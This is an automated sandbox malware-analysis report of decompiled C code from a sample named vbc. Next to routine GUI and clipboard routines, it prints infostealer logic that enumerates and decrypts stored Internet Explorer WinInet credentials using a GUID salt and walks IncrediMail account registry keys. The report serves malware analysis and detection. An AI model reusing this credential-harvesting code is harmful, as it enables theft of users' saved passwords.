                                                                                                                                                     				if(_t92 == 0) { // message 0x402 = WM_USER+2
                                                                                                                                                    					 *(__ecx + 0x25c) =  *(__ecx + 0x25c) & 0x00000000;
                                                                                                                                                    					E0040A437(__ecx);
                                                                                                                                                    					goto L22;
                                                                                                                                                    				}
                                                                                                                                                     				if(_t88 == 0x1c) { // WM_ACTIVATEAPP: wParam == 0 (deactivated) saves GetFocus() at this+0x378, otherwise posts WM_USER+0x1c to restore it
                                                                                                                                                    					__eflags = _a8;
                                                                                                                                                    					if(_a8 == 0) {
                                                                                                                                                    						 *((intOrPtr*)(_t91 + 0x378)) = GetFocus();
                                                                                                                                                    					} else {
                                                                                                                                                    						PostMessageA( *(__ecx + 0x108), 0x41c, 0, 0);
                                                                                                                                                    					}
                                                                                                                                                    					goto L23;
                                                                                                                                                    				}
                                                                                                                                                     				if(_t88 == 0x20) { // WM_SETCURSOR: cursor resource 0x67 over the control whose handle sits at this+0x114
                                                                                                                                                    					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x114));
                                                                                                                                                    					if(_a8 !=  *((intOrPtr*)(__ecx + 0x114))) {
                                                                                                                                                    						goto L23;
                                                                                                                                                    					}
                                                                                                                                                    					SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                                                                                                                    					return 1;
                                                                                                                                                    				}
                                                                                                                                                     				if(_t88 == 0x2b) { // WM_DRAWITEM: _a12 is a DRAWITEMSTRUCT* (+0x14 hwndItem, +0x18 hDC, +0x1c rcItem)
                                                                                                                                                    					_t82 = _a12;
                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t82 + 0x14)) -  *((intOrPtr*)(__ecx + 0x114));
                                                                                                                                                    					if( *((intOrPtr*)(_t82 + 0x14)) ==  *((intOrPtr*)(__ecx + 0x114))) {
                                                                                                                                                     						SetBkMode( *(_t82 + 0x18), 1); // TRANSPARENT
                                                                                                                                                     						SetTextColor( *(_t82 + 0x18), 0xff0000); // COLORREF is 0x00BBGGRR, so this is pure blue (link-style owner-drawn text)
                                                                                                                                                     						_v8 = SelectObject( *(_t82 + 0x18),  *(__ecx + 0x258)); // swap in the font kept at this+0x258
                                                                                                                                                    						asm("stosd");
                                                                                                                                                    						asm("stosd");
                                                                                                                                                    						asm("stosd");
                                                                                                                                                    						asm("stosd");
                                                                                                                                                    						_t90 = _a12;
                                                                                                                                                     						_v28 = 0x14; // DRAWTEXTPARAMS.cbSize = sizeof(DRAWTEXTPARAMS)
                                                                                                                                                     						_v20 = 5; // DRAWTEXTPARAMS.iLeftMargin
                                                                                                                                                     						DrawTextExA( *(_t90 + 0x18), __ecx + 0x158, 0xffffffff, _t90 + 0x1c, 4,  &_v28); // text at this+0x158 into rcItem, flags 4 = DT_VCENTER
                                                                                                                                                    						SelectObject( *(_t90 + 0x18), _v8);
                                                                                                                                                    						_t88 = _a4;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                     					if(_t88 == 0x7b) { // WM_CONTEXTMENU
                                                                                                                                                    						_t87 = _a8;
                                                                                                                                                    						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x370)) + 0x184))) {
                                                                                                                                                    							E0040B372(__ecx, _t87);
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				goto L23;
                                                                                                                                                    			}

                                                                                                                                                     Instruction address column (detached from the code listing above during extraction): 0x0040b53c .. 0x0040b6e0
                                                                                                                                                    0x0040b6e8
                                                                                                                                                    0x0040b6e8
                                                                                                                                                    0x0040b6ef
                                                                                                                                                    0x0040b6ef
                                                                                                                                                    0x0040b6d6
                                                                                                                                                    0x0040b6d6
                                                                                                                                                    0x0040b6d6
                                                                                                                                                    0x0040b6d4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b6fe
                                                                                                                                                    0x0040b690
                                                                                                                                                    0x0040b690
                                                                                                                                                    0x0040b691
                                                                                                                                                    0x0040b6a8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b6a8
                                                                                                                                                    0x0040b693
                                                                                                                                                    0x0040b696
                                                                                                                                                    0x0040b69e
                                                                                                                                                    0x0040b69e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b696
                                                                                                                                                    0x0040b557
                                                                                                                                                    0x0040b679
                                                                                                                                                    0x0040b680
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b680
                                                                                                                                                    0x0040b560
                                                                                                                                                    0x0040b651
                                                                                                                                                    0x0040b654
                                                                                                                                                    0x0040b671
                                                                                                                                                    0x0040b656
                                                                                                                                                    0x0040b663
                                                                                                                                                    0x0040b663
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b654
                                                                                                                                                    0x0040b569
                                                                                                                                                    0x0040b626
                                                                                                                                                    0x0040b62c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b641
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040b649
                                                                                                                                                    0x0040b572
                                                                                                                                                    0x0040b59e
                                                                                                                                                    0x0040b5a4
                                                                                                                                                    0x0040b5aa
                                                                                                                                                    0x0040b5b5
                                                                                                                                                    0x0040b5c3
                                                                                                                                                    0x0040b5da
                                                                                                                                                    0x0040b5e2
                                                                                                                                                    0x0040b5e3
                                                                                                                                                    0x0040b5e4
                                                                                                                                                    0x0040b5e5
                                                                                                                                                    0x0040b5e6
                                                                                                                                                    0x0040b5ff
                                                                                                                                                    0x0040b606
                                                                                                                                                    0x0040b60d
                                                                                                                                                    0x0040b619
                                                                                                                                                    0x0040b61b
                                                                                                                                                    0x0040b61b
                                                                                                                                                    0x0040b574
                                                                                                                                                    0x0040b577
                                                                                                                                                    0x0040b583
                                                                                                                                                    0x0040b58c
                                                                                                                                                    0x0040b594
                                                                                                                                                    0x0040b594
                                                                                                                                                    0x0040b58c
                                                                                                                                                    0x0040b577
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040B5B5
                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040B5C3
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0040B5D8
                                                                                                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B60D
                                                                                                                                                    • SelectObject.GDI32(00000014,?), ref: 0040B619
                                                                                                                                                      • Part of subcall function 0040B372: GetCursorPos.USER32(?), ref: 0040B37F
                                                                                                                                                      • Part of subcall function 0040B372: GetSubMenu.USER32 ref: 0040B38D
                                                                                                                                                      • Part of subcall function 0040B372: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B3BA
                                                                                                                                                    • LoadCursorA.USER32 ref: 0040B63A
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040B641
                                                                                                                                                    • PostMessageA.USER32 ref: 0040B663
                                                                                                                                                    • SetFocus.USER32(?), ref: 0040B69E
                                                                                                                                                    • SetFocus.USER32(?), ref: 0040B6EF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1416211542-0
                                                                                                                                                    • Opcode ID: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                                                                                    • Instruction ID: 8f05fcf81e8b57b2917fe7890bba9475612e1218cdf4c3fdd04c744704700eb5
                                                                                                                                                    • Opcode Fuzzy Hash: ada7ac9db0802c40b78b434d5b067a752f7538f931aaa86afb59dd9be5820f54
                                                                                                                                                    • Instruction Fuzzy Hash: E741A271100605EFCB119F64CD89EEE7775FB08300F104936E615A62A1CB799D91DBDE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00405FC6(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                    				long _v8;
                                                                                                                                                    				void* _v12;
                                                                                                                                                    				long _v16;
                                                                                                                                                    				void* _t14;
                                                                                                                                                    				void* _t29;
                                                                                                                                                    				void* _t34;
                                                                                                                                                    				long _t36;
                                                                                                                                                    
                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                    				EmptyClipboard();
                                                                                                                                                    				_t14 = E00405ECB(_a4);
                                                                                                                                                    				_v12 = _t14;
                                                                                                                                                    				if(_t14 == 0xffffffff) {
                                                                                                                                                    					_v8 = GetLastError();
                                                                                                                                                    				} else {
                                                                                                                                                    					_t36 = GetFileSize(_t14, 0);
                                                                                                                                                    					_t5 = _t36 + 1; // 0x1
                                                                                                                                                    					_t29 = GlobalAlloc(0x2000, _t5);
                                                                                                                                                    					if(_t29 == 0) {
                                                                                                                                                    						L4:
                                                                                                                                                    						_v8 = GetLastError();
                                                                                                                                                    					} else {
                                                                                                                                                    						_t34 = GlobalLock(_t29);
                                                                                                                                                    						if(ReadFile(_v12, _t34, _t36,  &_v16, 0) == 0) {
                                                                                                                                                    							goto L4;
                                                                                                                                                    						} else {
                                                                                                                                                    							 *((char*)(_t34 + _t36)) = 0;
                                                                                                                                                    							GlobalUnlock(_t29);
                                                                                                                                                    							SetClipboardData(1, _t29);
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					CloseHandle(_v12);
                                                                                                                                                    				}
                                                                                                                                                    				CloseClipboard();
                                                                                                                                                    				return _v8;
                                                                                                                                                    			}

                                                                                                                                                    (instruction address column, not alignable after extraction; range 0x00405fcc to 0x00406068)

APIs
• EmptyClipboard.USER32 ref: 00405FD0
  • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
• GetFileSize.KERNEL32(00000000,00000000), ref: 00405FED
• GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405FFE
• GlobalLock.KERNEL32 ref: 0040600B
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040601E
• GlobalUnlock.KERNEL32(00000000), ref: 0040602D
• SetClipboardData.USER32 ref: 00406036
• GetLastError.KERNEL32 ref: 0040603E
• CloseHandle.KERNEL32(?), ref: 0040604A
• GetLastError.KERNEL32 ref: 00406055
• CloseClipboard.USER32 ref: 0040605E
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
• Opcode ID: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
• Instruction ID: 732aa9399b2cd23c9d945101f46e029b0eae2bee8c87a14991e63b5ea8a72c25
• Opcode Fuzzy Hash: 5804eb7593f705abb245538e10f585bb03ca14e3a9190401cfadc2aaba18f8ee
• Instruction Fuzzy Hash: 6A113371900205FBDB109BB4DE4DBDE7F78EB08351F118176F606E1190DBB48A20DB69
Uniqueness

Uniqueness Score: -1.00%

APIs
• strcpy.MSVCRT(?,Common Programs,0040EEF9,?,?,?,?,?,00000104), ref: 0040EE4E
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: strcpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 3177657795-318151290
• Opcode ID: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
• Instruction ID: 838bbb5fcb7671a25bd4d31fd75230584a1d4f3c41bb848f6a939ae912ddcdf8
• Opcode Fuzzy Hash: 69181002a60778507a3d541a40da82393cbcfb54362146d699c3396572d884a2
• Instruction Fuzzy Hash: 66F0BDB32A878EF0D429496BCD4AEB744429151B46B7C4D37A002B46D5E87D8AF260DF
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%
E0040765B(void* __eflags, intOrPtr* _a4) {
	char _v532;
	short _v534;
	void _v1042;
	void _v1044;
	long _v1080;
	intOrPtr _v1084;
	intOrPtr _v1088;
	intOrPtr _v1096;
	int _v1104;
	char _v1108;
	intOrPtr _v1112;
	intOrPtr _v1116;
	intOrPtr _v1120;
	intOrPtr _v1124;
	intOrPtr _v1128;
	intOrPtr _v1132;
	long* _v1136;
	wchar_t* _v1140;
	wchar_t* _v1144;
	intOrPtr _v1148;
	char _v1152;
	intOrPtr _v1156;
	char _v1160;
	void* _v1164;
	void* _v1168;
	int _v1172;
	intOrPtr _v1176;
	char _v1180;
	char _v1184;
	signed int _v1188;
	void* __edi;
	void* __esi;
	void* _t76;
	int _t83;
	wchar_t* _t109;
	wchar_t* _t110;
	signed int _t120;
	int _t126;
	void* _t129;
	intOrPtr _t134;
	signed int _t140;
	void* _t142;
	void* _t143;
	void* _t144;

	_t142 = (_t140 & 0xfffffff8) - 0x4a4;
	_push(_t129);
	_v1108 = 0;
	_v1104 = 0;
	if(E00404647( &_v1108, _t129, __eflags) != 0) {
		_v1184 = 0;
		_v1180 = 0;
		if(_v1088 == 0) {
			_t76 = 0;
			__eflags = 0;
		} else {
			_t76 = _v1084(0, 0,  &_v1180,  &_v1184);
		}
		if(_t76 != 0) {
			_t120 = 9;
			memcpy( &_v1080, L"Microsoft_WinInet", _t120 << 2);
			_t143 = _t142 + 0xc;
			_v1172 = wcslen( &_v1080);
			_v1176 = 1;
			_v1188 = 0;
			if(_v1180 > 0) {
				while(_v1176 != 0) {
					_t134 =  *((intOrPtr*)(_v1184 + _v1188 * 4));
					_t83 = wcsncmp( *(_t134 + 8),  &_v1080, _v1172);
					_t143 = _t143 + 0xc;
					if(_t83 == 0) {
						do {
							_t25 = L"abe2869f-9b47-4cd9-a358-c22904dba7f7" + _t83; // 0x620061
							 *(_t83 + 0x417968) =  *_t25 << 2;
							_t83 = _t83 + 2;
							_t152 = _t83 - 0x4a;
						} while (_t83 < 0x4a);
						_v1148 =  *((intOrPtr*)(_t134 + 0x1c));
						_t139 =  &_v532;
						_v1160 = 0x4a;
						_v1156 = 0x417968;
						_v1152 =  *((intOrPtr*)(_t134 + 0x18));
						E004046D7( &_v532);
						if(E004047A0( &_v532, _t152) != 0 && E00404811(_t139,  &_v1152,  &_v1160,  &_v1168) != 0) {
							_v1044 = 0;
							memset( &_v1042, 0, 0x1fe);
							_t126 = _v1168;
							_t144 = _t143 + 0xc;
							if(_t126 > 0x1fa) {
								_t126 = 0x1fa;
							}
							memcpy( &_v1044, _v1164, _t126);
							_v1120 =  *((intOrPtr*)(_t134 + 0x20));
							_v1124 =  *((intOrPtr*)(_t134 + 4));
							_v1116 =  *((intOrPtr*)(_t134 + 0x10));
							_v1112 =  *((intOrPtr*)(_t134 + 0x14));
							_v1128 =  *((intOrPtr*)(_t134 + 0x2c));
							_v1144 =  *(_t134 + 8);
							_v1132 =  *((intOrPtr*)(_t134 + 0xc));
							_t109 =  &_v1044;
							_v534 = 0;
							_v1140 = _t109;
							_v1136 = 0x4125f4;
							_t110 = wcschr(_t109, 0x3a);
							_t143 = _t144 + 0x14;
							if(_t110 != 0) {
								 *_t110 = 0;
								_v1136 =  &(_t110[0]);
							}
							_v1180 =  *((intOrPtr*)( *_a4))( &_v1144);
							LocalFree(_v1168);
						}
						E004047F1( &_v532);
					}
					_v1188 = _v1188 + 1;
					if(_v1188 < _v1180) {
						continue;
					}
					goto L18;
				}
			}
			L18:
			_v1096(_v1184);
		}
	}
	return E004046C2( &_v1108);
}
0x00407661
0x0040766b
0x00407670
0x00407674
0x0040767f
0x00407689
0x0040768d
0x00407691
0x004076a8
0x004076a8
0x00407693
0x0040769f
0x0040769f
0x004076ac
0x004076b4
0x004076c3
0x004076c3
0x004076cf
0x004076d3
0x004076db
0x004076df
0x004076e5
0x004076f7
0x00407709
                                                                                                                                                    0x0040770e
                                                                                                                                                    0x00407713
                                                                                                                                                    0x00407719
                                                                                                                                                    0x00407719
                                                                                                                                                    0x00407724
                                                                                                                                                    0x0040772c
                                                                                                                                                    0x0040772d
                                                                                                                                                    0x0040772d
                                                                                                                                                    0x00407735
                                                                                                                                                    0x0040773c
                                                                                                                                                    0x00407743
                                                                                                                                                    0x0040774b
                                                                                                                                                    0x00407753
                                                                                                                                                    0x00407757
                                                                                                                                                    0x00407763
                                                                                                                                                    0x00407795
                                                                                                                                                    0x0040779d
                                                                                                                                                    0x004077a2
                                                                                                                                                    0x004077ab
                                                                                                                                                    0x004077b0
                                                                                                                                                    0x004077b2
                                                                                                                                                    0x004077b2
                                                                                                                                                    0x004077c1
                                                                                                                                                    0x004077c9
                                                                                                                                                    0x004077d0
                                                                                                                                                    0x004077d7
                                                                                                                                                    0x004077de
                                                                                                                                                    0x004077e5
                                                                                                                                                    0x004077ec
                                                                                                                                                    0x004077f3
                                                                                                                                                    0x004077f7
                                                                                                                                                    0x00407801
                                                                                                                                                    0x00407809
                                                                                                                                                    0x0040780d
                                                                                                                                                    0x00407815
                                                                                                                                                    0x0040781a
                                                                                                                                                    0x0040781f
                                                                                                                                                    0x00407821
                                                                                                                                                    0x00407827
                                                                                                                                                    0x00407827
                                                                                                                                                    0x0040783b
                                                                                                                                                    0x0040783f
                                                                                                                                                    0x0040783f
                                                                                                                                                    0x0040784c
                                                                                                                                                    0x0040784c
                                                                                                                                                    0x00407851
                                                                                                                                                    0x0040785d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040785d
                                                                                                                                                    0x004076e5
                                                                                                                                                    0x00407863
                                                                                                                                                    0x00407867
                                                                                                                                                    0x00407867
                                                                                                                                                    0x004076ac
                                                                                                                                                    0x0040787a

APIs
  • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,7554F420), ref: 00404654
  • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
  • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
• wcslen.MSVCRT ref: 004076C5
• wcsncmp.MSVCRT(?,?,?), ref: 00407709
• memset.MSVCRT ref: 0040779D
• memcpy.MSVCRT ref: 004077C1
• wcschr.MSVCRT ref: 00407815
• LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040783F
  • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$FreeLibrary$LoadLocalmemcpymemsetwcschrwcslenwcsncmp
• String ID: J$Microsoft_WinInet$hyA
• API String ID: 2413121283-319027496
• Opcode ID: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
• Instruction ID: ab6451454baefbc6762688e22d5ebab6c31fbbbf8d38218599acfc9a6d4ef790
• Opcode Fuzzy Hash: 3dbe31861b291603ba55481dc935e5bf9676d9bb6e305c4de7996f9a1c48bd4b
• Instruction Fuzzy Hash: 2751E4B1908345AFC710EF65C88495AB7E8FF89304F00492EFA99D3250E778E955CB57
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00402FC2(void* __eax, void* __ecx, void* __fp0, void* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				void _v271;
				char _v272;
				void _v527;
				char _v528;
				void _v827;
				char _v828;
				void* __edi;
				void* __esi;
				long _t40;
				void* _t44;
				void* _t55;
				void* _t60;
				void* _t66;
				void* _t67;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t77;

				_t77 = __fp0;
				_t66 = __ecx;
				_t67 = __eax;
				_t40 = E0040EB3F(_a4, "Software\\IncrediMail\\Identities",  &_a4);
				_t72 = _t71 + 0xc;
				if(_t40 == 0) {
					_v12 = 0;
					_v272 = 0;
					memset( &_v271, 0, 0xff);
					_t44 = E0040EC05(_a4, 0,  &_v272);
					_t73 = _t72 + 0x18;
					while(_t44 == 0) {
						E0040EBC1(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
						_v828 = 0;
						memset( &_v827, 0, 0x12b);
						sprintf( &_v828, "%s\\Accounts",  &_v272);
						_t55 = E0040EB3F(_a4,  &_v828,  &_v8);
						_t74 = _t73 + 0x38;
						if(_t55 == 0) {
							_v16 = 0;
							_v528 = 0;
							memset( &_v527, 0, 0xff);
							_t60 = E0040EC05(_v8, 0,  &_v528);
							_t74 = _t74 + 0x18;
							while(_t60 == 0) {
								E00402D9A(_t66, _t67, 0xff, _t77, _v8,  &_v528);
								_v16 = _v16 + 1;
								_t60 = E0040EC05(_v8, _v16,  &_v528);
								_t74 = _t74 + 0xc;
							}
							RegCloseKey(_v8);
						}
						_v12 = _v12 + 1;
						_t44 = E0040EC05(_a4, _v12,  &_v272);
						_t73 = _t74 + 0xc;
					}
					_t40 = RegCloseKey(_a4);
				}
				 *((char*)(_t67 + 0xa9c)) = 0;
				return _t40;
			}
                                                                                                                                                    0x004030f9
                                                                                                                                                    0x004030fe
                                                                                                                                                    0x004030fe
                                                                                                                                                    0x0040310c
                                                                                                                                                    0x00403112
                                                                                                                                                    0x00403113
                                                                                                                                                    0x0040311c

APIs
• Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
• memset.MSVCRT ref: 00403005
• Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
• memset.MSVCRT ref: 00403052
• sprintf.MSVCRT ref: 0040306A
• memset.MSVCRT ref: 0040309B
• RegCloseKey.ADVAPI32(?), ref: 004030E3
• RegCloseKey.ADVAPI32(?), ref: 0040310C
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$Close$EnumOpensprintf
• String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
• API String ID: 3672803090-3168940695
• Opcode ID: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
• Instruction ID: 2ec2bfd25db4f87ede08292043277b4916c0dadc31aa5cf960337fea200e46ca
• Opcode Fuzzy Hash: 0cf548ca034e9c156653f3b1dbb9e895c43ca7fac2608918d84bd2d804a0d0b2
• Instruction Fuzzy Hash: D6314EB290021CBADB11EB95CC81EEEBB7CAF14344F0041B6B909A1051E7799F948F64
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 48%
E00407A64(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
    char* _v0;
    int _v4;
    int _t39;
    char* _t49;
    void* _t51;
    int _t64;
    signed int _t70;
    signed int _t71;

    _t59 = __ecx;
    _t71 = _t70 & 0xfffffff8;
    E004118A0(0x204c, __ecx);
    /* _a8 doubles as the HMENU argument; count its items and walk them by position */
    _t39 = GetMenuItemCount(_a8.cbSize);
    _a4 = _t39;
    _v4 = 0;
    if(_t39 <= 0) {
        L15:
        return _t39;
    } else {
        do {
            /* zero the 0x1000-byte text buffer and fill a MENUITEMINFOA
               (cbSize 0x30, fMask 0x36 = MIIM_ID|MIIM_SUBMENU|MIIM_TYPE|MIIM_DATA) */
            memset( &_a57, 0, 0x1000);
            _t71 = _t71 + 0xc;
            _a44 =  &_a56;
            _a8.cbSize = 0x30;
            _a12 = 0x36;
            _a48 = 0x1000;
            _a56 = 0;
            if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
                goto L14;
            }
            if(_a56 == 0) {
                L12:
                /* _a28 is hSubMenu: recurse into the submenu, if any, then advance */
                _t80 = _a28;
                if(_a28 != 0) {
                    _push(0);
                    _push(_a28);
                    _push(_a4);
                    E00407A64(_t59, _t80);
                    _t71 = _t71 + 0xc;
                }
                goto L14;
            }
            /* item has text: keep any "\t" accelerator suffix, look up replacement text by ID */
            _t64 = _a24;
            _a4160 = 0;
            memset( &_a4161, 0, 0x1000);
            _t49 = strchr( &_a56, 9);
            _t71 = _t71 + 0x14;
            _v0 = _t49;
            if(_a28 != 0) {
                if(_a12 == 0) {
                     *0x4171b4 =  *0x4171b4 + 1;
                    _t64 =  *0x4171b4 + 0x11558;
                    __eflags = _t64;
                } else {
                    _t64 = _v4 + 0x11171;
                }
            }
            _t51 = E00407D89(_t64,  &_a4160);
            _pop(_t59);
            if(_t51 != 0) {
                if(_v0 != 0) {
                    strcat( &_a4160, _v0);
                    _pop(_t59);
                }
                /* 0x400 = MF_BYPOSITION: replace the item's text in place */
                ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
            }
            goto L12;
            L14:
            _v4 = _v4 + 1;
            _t39 = _v4;
        } while (_t39 < _a4);
        goto L15;
    }
}

Instruction addresses for the decompiled lines above (one per line, in listing order; 0x00000000 marks lines with no address): 0x00407a64, 0x00407a67, 0x00407a6f, 0x00407a7a, 0x00407a84, 0x00407a88, 0x00407a8c, 0x00407bb2, 0x00407bb8, 0x00407a92, 0x00407a97, 0x00407a9e, 0x00407aa3, 0x00407aaa, 0x00407ab9, 0x00407ac4, 0x00407acc, 0x00407ad0, 0x00407adc, 0x00000000, 0x00000000, 0x00407ae6, 0x00407b8a, 0x00407b8a, 0x00407b8e, 0x00407b90, 0x00407b91, 0x00407b95, 0x00407b98, 0x00407b9d, 0x00407b9d, 0x00000000, 0x00407b8e, 0x00407aec, 0x00407afa, 0x00407b01, 0x00407b0d, 0x00407b12, 0x00407b19, 0x00407b1d, 0x00407b22, 0x00407b30, 0x00407b3c, 0x00407b3c, 0x00407b24, 0x00407b28, 0x00407b28, 0x00407b22, 0x00407b4b, 0x00407b53, 0x00407b54, 0x00407b5a, 0x00407b68, 0x00407b6e, 0x00407b6e, 0x00407b84, 0x00407b84, 0x00000000, 0x00407ba0, 0x00407ba0, 0x00407ba4, 0x00407ba8, 0x00000000, 0x00407a97

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                                                                                                    • String ID: 0$6
                                                                                                                                                    • API String ID: 1757351179-3849865405
                                                                                                                                                    • Opcode ID: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                                                                                    • Instruction ID: 1677788af10e21d8d50b2ad3b046da146c202dfcbfc60db105475917acddfa9f
                                                                                                                                                    • Opcode Fuzzy Hash: 0312b36b69dc19ec32793f3e1a4e0bacee62623ae2581f679c82ae12aac676fd
                                                                                                                                                    • Instruction Fuzzy Hash: 1A316D71808385AFD7109F55D84099BBBF9EB84358F14883FFA9492250D378EA44CF6B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9B9
                                                                                                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
